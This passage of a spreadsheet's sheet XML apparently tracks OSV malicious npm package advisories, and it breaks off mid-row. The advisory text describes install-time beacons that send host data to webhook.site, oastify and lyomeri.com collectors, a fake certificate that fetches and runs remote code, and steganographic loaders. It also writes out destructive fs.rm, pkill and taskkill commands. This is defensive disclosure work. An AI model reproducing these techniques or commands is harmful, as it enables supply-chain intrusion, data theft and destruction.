      <c r="J1336" s="5" t="inlineStr"/>
      <c r="K1336" s="5" t="inlineStr"/>
      <c r="L1336" s="5" t="inlineStr">
        <is>
          <t>npm:selfcerts</t>
        </is>
      </c>
      <c r="M1336" s="5" t="inlineStr"/>
      <c r="N1336" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1336" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1336" s="5" t="inlineStr"/>
      <c r="Q1336" s="5" t="inlineStr"/>
      <c r="R1336" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (ef5688e6ff2ef3728556e4e455154ad9a8f6c44670eee611d55adb3cba250536)
index.js reads sample/cert.pem, strips the BEGIN/END CERTIFICATE header and footer, base64-decodes the body, and eval()s the result. The decoded bytes are a JavaScript IIFE that base64-decodes a hardcoded URL (http://144.172.104.211/settings/privacy.php), fetches its response over plain HTTP, and pipes the body into a detached python3 process via stdin, executing whatever the remote host returns. The loader (loadSampleCertificate) is invoked unconditionally at the top of the exported generateCertificates() API, so any consumer that uses the package as advertised triggers remote code execution on the installer's host. Presenting an executable payload as a PEM certificate and nesting the C2 URL under a second base64 layer is deliberate obfuscation with no legitimate role in a certificate-generation library.
</t>
        </is>
      </c>
      <c r="S1336" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16060</t>
        </is>
      </c>
    </row>
    <row r="1337">
      <c r="A1337" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1337" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1337" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16061</t>
        </is>
      </c>
      <c r="D1337" s="5" t="inlineStr"/>
      <c r="E1337" s="5" t="inlineStr"/>
      <c r="F1337" s="5" t="inlineStr"/>
      <c r="G1337" s="5" t="inlineStr"/>
      <c r="H1337" s="5" t="inlineStr"/>
      <c r="I1337" s="5" t="inlineStr"/>
      <c r="J1337" s="5" t="inlineStr"/>
      <c r="K1337" s="5" t="inlineStr"/>
      <c r="L1337" s="5" t="inlineStr">
        <is>
          <t>npm:@yongot/canary-mcp-isolation</t>
        </is>
      </c>
      <c r="M1337" s="5" t="inlineStr"/>
      <c r="N1337" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1337" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1337" s="5" t="inlineStr"/>
      <c r="Q1337" s="5" t="inlineStr"/>
      <c r="R1337" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (1fed7c0ff512ccb2e87647a41a92653138ff50b2be906043aba86ce76b49e340)
The package's postinstall script (beacon.js), also re-executed on require via index.js, sends the installer's hostname, run identifiers, and the output of the `id` shell command to a hardcoded third-party collector at https://webhook.site/b76376f8-118e-44f1-a5ee-8a73f55b137b over HTTPS. The same script probes the GCP instance metadata service at 169.254.169.254 and metadata.google.internal with the `Metadata-Flavor: Google` header and reports the status and body back to the webhook, disclosing whether the install environment is a cloud VM and what IMDS returns. Data leaves the installer's host to an attacker-controlled collector automatically on `npm install` and on `require()`, without consent.
</t>
        </is>
      </c>
      <c r="S1337" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16061</t>
        </is>
      </c>
    </row>
    <row r="1338">
      <c r="A1338" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1338" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1338" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16062</t>
        </is>
      </c>
      <c r="D1338" s="5" t="inlineStr"/>
      <c r="E1338" s="5" t="inlineStr"/>
      <c r="F1338" s="5" t="inlineStr"/>
      <c r="G1338" s="5" t="inlineStr"/>
      <c r="H1338" s="5" t="inlineStr"/>
      <c r="I1338" s="5" t="inlineStr"/>
      <c r="J1338" s="5" t="inlineStr"/>
      <c r="K1338" s="5" t="inlineStr"/>
      <c r="L1338" s="5" t="inlineStr">
        <is>
          <t>npm:@yongot/canary-mcp-test</t>
        </is>
      </c>
      <c r="M1338" s="5" t="inlineStr"/>
      <c r="N1338" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1338" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1338" s="5" t="inlineStr"/>
      <c r="Q1338" s="5" t="inlineStr"/>
      <c r="R1338" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (b93b70d19f6065f9757e39a5d7f799ca9cfff26e2c47b6e4c51012a104885578)
Package @yongot/canary-mcp-test@2.0.0 ships beacon.js which runs `execSync('id')`, reads `os.hostname()`, and issues an HTTPS GET to a hardcoded webhook.site collector (https://webhook.site/b76376f8-118e-44f1-a5ee-8a73f55b137b) with stage, host, and id_output query parameters. The package.json postinstall hook invokes `node beacon.js postinstall`, so the beacon fires automatically on `npm install`. index.js (the package main) also requires beacon.js twice at load time, so any consumer that imports the package re-triggers the same exfiltration of the installer's Unix uid/gid/groups and hostname to the third-party webhook collector.
</t>
        </is>
      </c>
      <c r="S1338" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16062</t>
        </is>
      </c>
    </row>
    <row r="1339">
      <c r="A1339" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1339" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1339" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16063</t>
        </is>
      </c>
      <c r="D1339" s="5" t="inlineStr"/>
      <c r="E1339" s="5" t="inlineStr"/>
      <c r="F1339" s="5" t="inlineStr"/>
      <c r="G1339" s="5" t="inlineStr"/>
      <c r="H1339" s="5" t="inlineStr"/>
      <c r="I1339" s="5" t="inlineStr"/>
      <c r="J1339" s="5" t="inlineStr"/>
      <c r="K1339" s="5" t="inlineStr"/>
      <c r="L1339" s="5" t="inlineStr">
        <is>
          <t>npm:alloy-graphql</t>
        </is>
      </c>
      <c r="M1339" s="5" t="inlineStr"/>
      <c r="N1339" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1339" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1339" s="5" t="inlineStr"/>
      <c r="Q1339" s="5" t="inlineStr"/>
      <c r="R1339" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (80ee3815d12ec95aedb4bbe0d3de5c516e99163ca1eba52c2a3de7038b9a2ac0)
package.json declares a preinstall hook that runs index.js on npm install. The script collects hostname, username, home directory, DNS servers, current working directory, and package.json contents, and reads /etc/passwd and /etc/hosts from the installer's host. The collected data is HTTPS-POSTed to a hardcoded Burp Collaborator subdomain at ipbtwv9063nc5hvhodh0s4u9x03rrhf6.oastify.com. The package has no advertised functionality beyond this exfiltration payload.
</t>
        </is>
      </c>
      <c r="S1339" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16063</t>
        </is>
      </c>
    </row>
    <row r="1340">
      <c r="A1340" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1340" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1340" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16064</t>
        </is>
      </c>
      <c r="D1340" s="5" t="inlineStr"/>
      <c r="E1340" s="5" t="inlineStr"/>
      <c r="F1340" s="5" t="inlineStr"/>
      <c r="G1340" s="5" t="inlineStr"/>
      <c r="H1340" s="5" t="inlineStr"/>
      <c r="I1340" s="5" t="inlineStr"/>
      <c r="J1340" s="5" t="inlineStr"/>
      <c r="K1340" s="5" t="inlineStr"/>
      <c r="L1340" s="5" t="inlineStr">
        <is>
          <t>npm:bx-ui-view</t>
        </is>
      </c>
      <c r="M1340" s="5" t="inlineStr"/>
      <c r="N1340" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1340" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1340" s="5" t="inlineStr"/>
      <c r="Q1340" s="5" t="inlineStr"/>
      <c r="R1340" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (ce3874d2c55544bbbf59b6a60c3002b13e242fb53160a455597b13fdd37231f8)
package.json declares a dependency whose key equals the package's own name (bx-ui-view) and whose value is a plain HTTPS URL (https://package-access.pages.dev/bx-ui-view) rather than a registry version range. On `npm install`, npm resolves this URL, downloads whatever tarball is served, and executes any lifecycle scripts inside it — with no version pin, no integrity check, and no hash/signature verification. The shipped index.js is a 3-line inert stub, so the manifest line is the entire published surface: the installer receives whatever content the operator of package-access.pages.dev chooses to serve at install time. The self-name + off-registry URL + stub source combination is the dependency-confusion / smuggled-payload shape, and the pages.dev host is unrelated to any registry or declared publisher domain.
</t>
        </is>
      </c>
      <c r="S1340" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16064</t>
        </is>
      </c>
    </row>
    <row r="1341">
      <c r="A1341" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1341" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1341" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16065</t>
        </is>
      </c>
      <c r="D1341" s="5" t="inlineStr"/>
      <c r="E1341" s="5" t="inlineStr"/>
      <c r="F1341" s="5" t="inlineStr"/>
      <c r="G1341" s="5" t="inlineStr"/>
      <c r="H1341" s="5" t="inlineStr"/>
      <c r="I1341" s="5" t="inlineStr"/>
      <c r="J1341" s="5" t="inlineStr"/>
      <c r="K1341" s="5" t="inlineStr"/>
      <c r="L1341" s="5" t="inlineStr">
        <is>
          <t>npm:express-session-timer</t>
        </is>
      </c>
      <c r="M1341" s="5" t="inlineStr"/>
      <c r="N1341" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1341" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1341" s="5" t="inlineStr"/>
      <c r="Q1341" s="5" t="inlineStr"/>
      <c r="R1341" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (325e241839ca2d0861d19807df248bf7b06922533bccb441bbee521471f5d73f)
express-session-timer@1.0.1 schedules an unconditional destructive routine at module load time. Approximately 18 seconds after `require('express-session-timer')`, the package recursively removes `&lt;cwd&gt;/src` via `fs.rm(path.join(process.cwd(),'src'), {recursive:true, force:true})` and terminates Node processes with `pkill -f "node.*${process.cwd()}"` on Unix, `taskkill /IM node.exe /F` on Windows, and `npx pm2 delete all`. The behavior fires with no configuration, opt-in, or relationship to the package's advertised functionality — merely importing the module deletes the installer's source tree and stops their running server. The manifest also pins `express-timer: ^0.0.1-security`, npm's security-hold placeholder convention, indicating an unpinned resolution against a name previously held after takedown.
</t>
        </is>
      </c>
      <c r="S1341" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16065</t>
        </is>
      </c>
    </row>
    <row r="1342">
      <c r="A1342" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1342" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1342" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16069</t>
        </is>
      </c>
      <c r="D1342" s="5" t="inlineStr"/>
      <c r="E1342" s="5" t="inlineStr"/>
      <c r="F1342" s="5" t="inlineStr"/>
      <c r="G1342" s="5" t="inlineStr"/>
      <c r="H1342" s="5" t="inlineStr"/>
      <c r="I1342" s="5" t="inlineStr"/>
      <c r="J1342" s="5" t="inlineStr"/>
      <c r="K1342" s="5" t="inlineStr"/>
      <c r="L1342" s="5" t="inlineStr">
        <is>
          <t>npm:reactlogo-load</t>
        </is>
      </c>
      <c r="M1342" s="5" t="inlineStr"/>
      <c r="N1342" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1342" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1342" s="5" t="inlineStr"/>
      <c r="Q1342" s="5" t="inlineStr"/>
      <c r="R1342" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (a0f9d76fcf9f229c0a11508004a2be764133c6195530c4d56563eb28c358ab5f)
The package presents itself as a logo/color utility but its exported loadLogo() function extracts a URL from LSB-encoded bits of a PNG, fetches the response body, and executes it via a reflective Function-constructor invocation. The 'constructor' property name and the Function reference are hidden behind a deterministic string-shuffle helper (hsvMean) named as a color utility, so no plaintext 'constructor', 'Function', 'eval', or destination URL appears in the source. runInContext binds global.require, module, and exports into the executed script, giving the fetched code full Node runtime capability on the caller's host. Following the README's documented usage (vite/tailwind build integration) triggers the fetch-and-execute path, so arbitrary attacker-controlled code runs on any machine that adopts this library.
</t>
        </is>
      </c>
      <c r="S1342" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16069</t>
        </is>
      </c>
    </row>
    <row r="1343">
      <c r="A1343" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1343" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1343" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16070</t>
        </is>
      </c>
      <c r="D1343" s="5" t="inlineStr"/>
      <c r="E1343" s="5" t="inlineStr"/>
      <c r="F1343" s="5" t="inlineStr"/>
      <c r="G1343" s="5" t="inlineStr"/>
      <c r="H1343" s="5" t="inlineStr"/>
      <c r="I1343" s="5" t="inlineStr"/>
      <c r="J1343" s="5" t="inlineStr"/>
      <c r="K1343" s="5" t="inlineStr"/>
      <c r="L1343" s="5" t="inlineStr">
        <is>
          <t>npm:@fyxzpediaa/baileys</t>
        </is>
      </c>
      <c r="M1343" s="5" t="inlineStr"/>
      <c r="N1343" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1343" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1343" s="5" t="inlineStr"/>
      <c r="Q1343" s="5" t="inlineStr"/>
      <c r="R1343" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (0747ec3c1ce519798cac2e89f8ec1e1532d428355a13929f0176a11d77a2b175)
This fork of Baileys injects a covert remote-directed action into the WhatsApp socket. On every WebSocket connection, socketConnect() reconstructs a URL from a char-code array (decoding to https://raw.githubusercontent.com/skyzopedia/NewsletterID/refs/heads/main/VIP_Push.json), fetches a JSON list from that mutable GitHub branch, and 200 seconds after connect iterates the list issuing authenticated `w:mex` queries with query_id 7871414976211147 (QueryIds.FOLLOW) against the installer's own WhatsApp session. A separate exported helper `generateMessageV` decodes a base64+XOR(key=23)-obfuscated string to a hardcoded `&lt;digits&gt;@newsletter` JID and invokes the same FOLLOW query. The obfuscation of both the URL (char-code array) and the JID literal (base64+XOR) exists solely to hide these targets from source review; upstream Baileys does not contain this code path. The runtime dependency `@whiskeysockets/eslint-config` is also declared as a mutable GitHub tarball reference (`github:whiskeysockets/eslint-config`) rather than a pinned registry range, so `npm install` resolves it to whatever that repository's default branch currently contains. The covert action uses the installer's authenticated identity to gain reach for author-chosen newsletter IDs but does not exfiltrate credentials, install persistence, or execute remote code on the installer's host; the harm is loss of control over the installer's WhatsApp account actions, not machine compromise.
</t>
        </is>
      </c>
      <c r="S1343" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16070</t>
        </is>
      </c>
    </row>
    <row r="1344">
      <c r="A1344" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1344" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1344" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16071</t>
        </is>
      </c>
      <c r="D1344" s="5" t="inlineStr"/>
      <c r="E1344" s="5" t="inlineStr"/>
      <c r="F1344" s="5" t="inlineStr"/>
      <c r="G1344" s="5" t="inlineStr"/>
      <c r="H1344" s="5" t="inlineStr"/>
      <c r="I1344" s="5" t="inlineStr"/>
      <c r="J1344" s="5" t="inlineStr"/>
      <c r="K1344" s="5" t="inlineStr"/>
      <c r="L1344" s="5" t="inlineStr">
        <is>
          <t>npm:cat-sis2go-utils</t>
        </is>
      </c>
      <c r="M1344" s="5" t="inlineStr"/>
      <c r="N1344" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1344" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1344" s="5" t="inlineStr"/>
      <c r="Q1344" s="5" t="inlineStr"/>
      <c r="R1344" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">cat-sis2go-utils is a dependency-confusion package published against the SIS2GO namespace, with versions inflated to 99.0.0 and 99.1.0. It ships no library code (index.js is an 87-byte stub), and package.json declares both preinstall and postinstall running `node scripts/run.js`, so the payload executes twice during npm install before any application code. The script resolves a DNS canary and POSTs to a webhook.site collector; 99.1.0 additionally sends os.userInfo().username and os.hostname(). The author labels this a PoC, but the beacon fires on any install that resolves the package and exfiltrates a username usable for follow-on attacks, and dependency-confusion packages require incident response even when trivial.
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (ad357542f3dd0e1b598ef36d440b1868ac28c6889226864bf799b2f7b6bf5e91)
Package cat-sis2go-utils@99.0.0 declares both preinstall and postinstall lifecycle hooks in package.json that execute scripts/run.js on every npm install. The script unconditionally issues a DNS lookup against d22d92dc-84e5-4b58-8cd6-75bf1ac452c7.dnshook.site and POSTs a JSON beacon containing the installer's hostname and process context to https://webhook.site/d22d92dc-84e5-4b58-8cd6-75bf1ac452c7. The package description self-identifies as a dependency-confusion PoC, and the 99.0.0 version is consistent with a resolution-winning squat targeting an internal package name. Installing the package results in arbitrary code execution on the installer host and fingerprints the machine to third-party out-of-band collectors under the operator's control.
</t>
        </is>
      </c>
      <c r="S1344" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16071</t>
        </is>
      </c>
    </row>
    <row r="1345">
      <c r="A1345" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1345" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1345" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16072</t>
        </is>
      </c>
      <c r="D1345" s="5" t="inlineStr"/>
      <c r="E1345" s="5" t="inlineStr"/>
      <c r="F1345" s="5" t="inlineStr"/>
      <c r="G1345" s="5" t="inlineStr"/>
      <c r="H1345" s="5" t="inlineStr"/>
      <c r="I1345" s="5" t="inlineStr"/>
      <c r="J1345" s="5" t="inlineStr"/>
      <c r="K1345" s="5" t="inlineStr"/>
      <c r="L1345" s="5" t="inlineStr">
        <is>
          <t>npm:easypanel-agent</t>
        </is>
      </c>
      <c r="M1345" s="5" t="inlineStr"/>
      <c r="N1345" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1345" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1345" s="5" t="inlineStr"/>
      <c r="Q1345" s="5" t="inlineStr"/>
      <c r="R1345" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (7eb103b6863369372ba8c07701264f8b0f6b57e3217e07912c8efbd9371c648f)
The package's preinstall lifecycle script (preinstall.js) executes automatically on `npm install` and collects the installer's hostname, OS username, current working directory, and CI-related environment variable names. The collected data is base64-encoded and transmitted to a hardcoded out-of-band collector under lyomeri.com via both a DNS lookup (encoding data into a subdomain label under easypanel-agent.&lt;data&gt;.oob.lyomeri.com) and an HTTP GET request to the same host. The package's main entry, index.js, is an empty stub (`module.exports = {}`), so the install-time beacon is the sole functional behavior. The package name mimics the 'easypanel' product, consistent with a dependency-confusion or typosquat delivery vehicle. An in-source comment self-labeling the code as a 'benign canary' does not change that installer-controlled data leaves the machine without consent to an author-controlled endpoint.
</t>
        </is>
      </c>
      <c r="S1345" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16072</t>
        </is>
      </c>
    </row>
    <row r="1346">
      <c r="A1346" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1346" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1346" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16073</t>
        </is>
      </c>
      <c r="D1346" s="5" t="inlineStr"/>
      <c r="E1346" s="5" t="inlineStr"/>
      <c r="F1346" s="5" t="inlineStr"/>
      <c r="G1346" s="5" t="inlineStr"/>
      <c r="H1346" s="5" t="inlineStr"/>
      <c r="I1346" s="5" t="inlineStr"/>
      <c r="J1346" s="5" t="inlineStr"/>
      <c r="K1346" s="5" t="inlineStr"/>
      <c r="L1346" s="5" t="inlineStr">
        <is>
          <t>npm:easypanel-api-client</t>
        </is>
      </c>
      <c r="M1346" s="5" t="inlineStr"/>
      <c r="N1346" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1346" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1346" s="5" t="inlineStr"/>
      <c r="Q1346" s="5" t="inlineStr"/>
      <c r="R1346" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (cef6da51fcc215c514680417cfd3bacb5725b91a5b4a058fd6d2b161106209b0)
The package ships an empty library body (index.js exports {}) and a preinstall lifecycle script that runs automatically on npm install. The preinstall script collects installer-side identifiers — hostname, username, current working directory, and the names of CI-related environment variables — base64url-encodes them, and transmits them via both a DNS lookup and an HTTP request to a subdomain of oob.lyomeri.com (e.g. easypanel-api-client.&lt;encoded-chunk&gt;.oob.lyomeri.com, with the HTTP variant POSTing to /npm/&lt;encoded&gt;). The package has no functional code beyond this beacon, matching the dependency-confusion / namespace-squat research-beacon shape targeting internal package names.
</t>
        </is>
      </c>
      <c r="S1346" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16073</t>
        </is>
      </c>
    </row>
    <row r="1347">
      <c r="A1347" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1347" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1347" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16074</t>
        </is>
      </c>
      <c r="D1347" s="5" t="inlineStr"/>
      <c r="E1347" s="5" t="inlineStr"/>
      <c r="F1347" s="5" t="inlineStr"/>
      <c r="G1347" s="5" t="inlineStr"/>
      <c r="H1347" s="5" t="inlineStr"/>
      <c r="I1347" s="5" t="inlineStr"/>
      <c r="J1347" s="5" t="inlineStr"/>
      <c r="K1347" s="5" t="inlineStr"/>
      <c r="L1347" s="5" t="inlineStr">
        <is>
          <t>npm:easypanel-deploy</t>
        </is>
      </c>
      <c r="M1347" s="5" t="inlineStr"/>
      <c r="N1347" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1347" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1347" s="5" t="inlineStr"/>
      <c r="Q1347" s="5" t="inlineStr"/>
      <c r="R1347" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (0ac486399ab6c99cf83bfcf80e487c414fd29430e27f0d929ff7034ed333c7e8)
The package's preinstall lifecycle script runs automatically on `npm install` and collects installer-side identifiers — `os.hostname()`, `os.userInfo().username`, the current working directory, and CI-related environment variable names — base64url-encodes them, and sends them to a hardcoded third-party out-of-band collector under `oob.lyomeri.com` via both a DNS lookup (`easypanel-deploy.&lt;chunk&gt;daco3v4q6f49egu1ds1gwjnsjb88s5kcp.oob.lyomeri.com`) and an HTTP GET request to the same host. The behavior fires without user consent on install, exfiltrates host reconnaissance data to an attacker-controlled endpoint, and is consistent with a dependency-confusion / beacon package. An in-source comment labeling this as a 'benign canary' does not change the observable behavior.
</t>
        </is>
      </c>
      <c r="S1347" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16074</t>
        </is>
      </c>
    </row>
    <row r="1348">
      <c r="A1348" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1348" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1348" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16075</t>
        </is>
      </c>
      <c r="D1348" s="5" t="inlineStr"/>
      <c r="E1348" s="5" t="inlineStr"/>
      <c r="F1348" s="5" t="inlineStr"/>
      <c r="G1348" s="5" t="inlineStr"/>
      <c r="H1348" s="5" t="inlineStr"/>
      <c r="I1348" s="5" t="inlineStr"/>
      <c r="J1348" s="5" t="inlineStr"/>
      <c r="K1348" s="5" t="inlineStr"/>
      <c r="L1348" s="5" t="inlineStr">
        <is>
          <t>npm:easypanel-hosting</t>
        </is>
      </c>
      <c r="M1348" s="5" t="inlineStr"/>
      <c r="N1348" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1348" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1348" s="5" t="inlineStr"/>
      <c r="Q1348" s="5" t="inlineStr"/>
      <c r="R1348" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (db6a378b33bb2f33088ed90db4ac48e81368e30d5ef38578dca3b4345e9cb06b)
easypanel-hosting@1.0.0 ships a stub index.js (`module.exports = {}`) and an npm preinstall lifecycle script that collects the installer's hostname, username, current working directory, and CI-related environment variable names, base64url-encodes them, and sends them off-host via a DNS lookup and an HTTP request to a hardcoded out-of-band subdomain under lyomeri.com (e.g. `easypanel-hosting.&lt;token&gt;.oob.lyomeri.com`, with the encoded payload placed in the DNS label and in the HTTP path `/npm/&lt;encoded&gt;`). The exfiltration fires automatically on `npm install` before any user code runs. The empty main module and package name resembling a hosting-adjacent product are consistent with a dependency-confusion or reconnaissance probe; regardless of framing, installer identity metadata leaves the machine unconditionally to an author-controlled OOB collector.
</t>
        </is>
      </c>
      <c r="S1348" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16075</t>
        </is>
      </c>
    </row>
    <row r="1349">
      <c r="A1349" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1349" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1349" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16076</t>
        </is>
      </c>
      <c r="D1349" s="5" t="inlineStr"/>
      <c r="E1349" s="5" t="inlineStr"/>
      <c r="F1349" s="5" t="inlineStr"/>
      <c r="G1349" s="5" t="inlineStr"/>
      <c r="H1349" s="5" t="inlineStr"/>
      <c r="I1349" s="5" t="inlineStr"/>
      <c r="J1349" s="5" t="inlineStr"/>
      <c r="K1349" s="5" t="inlineStr"/>
      <c r="L1349" s="5" t="inlineStr">
        <is>
          <t>npm:external_deps_enjoyer</t>
        </is>
      </c>
      <c r="M1349" s="5" t="inlineStr"/>
      <c r="N1349" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1349" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1349" s="5" t="inlineStr"/>
      <c r="Q1349" s="5" t="inlineStr"/>
      <c r="R1349" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (8d4909b60251f0448ff7bc689262f363e3ec4c2cebf82abe3eb0c7f8769931a6)
